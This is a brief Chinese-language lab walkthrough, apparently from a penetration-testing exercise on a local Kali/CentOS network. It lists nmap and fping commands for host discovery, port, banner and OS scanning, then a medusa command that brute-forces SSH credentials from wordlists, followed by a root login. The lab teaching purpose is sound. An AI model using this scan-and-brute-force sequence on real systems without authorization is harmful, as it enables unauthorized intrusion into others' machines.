实验环境:kali,centos8
1.确认靶机
因为是在同一网段下测试的,所以可以直接看本机的ip来缩小靶机的搜索范围
确定了靶机ip范围就可以用nmap搜索
在同一网段下nmap发送arp包来测试存活主机
还能用fping发送icmp包来进行三层测试
nmap -sn 192.168.5.0/24
fping -g 192.168.5.0/24 -s -a
其中192.168.5.133是本机地址,范围就缩小到两个地址,对两个地址再用nmap扫描以确定目标靶机
nmap 192.168.5.2 192.168.5.131 -PU53 -sn
nmap 192.168.5.2 192.168.5.131 -PA80 -sn
nmap 192.168.5.2 192.168.5.131 -sS
nmap 192.168.5.2 192.168.5.131 -sT -p 22 --script=banner.nse
从这里就基本知道目标靶机的ip和基本信息,可以再用nmap确认靶机的OS
nmap -O 192.168.5.131
2.进入目标靶机
掌握目标机的一些信息后就可以尝试进行远程登录
用medusa和较大的字典破解目标机的username和password
medusa -M ssh -h 192.168.5.131 -U username.txt -P password.txt
找到目标机账号密码后进入目标机
ssh root@192.168.5.131
输入密码进入目标机
成功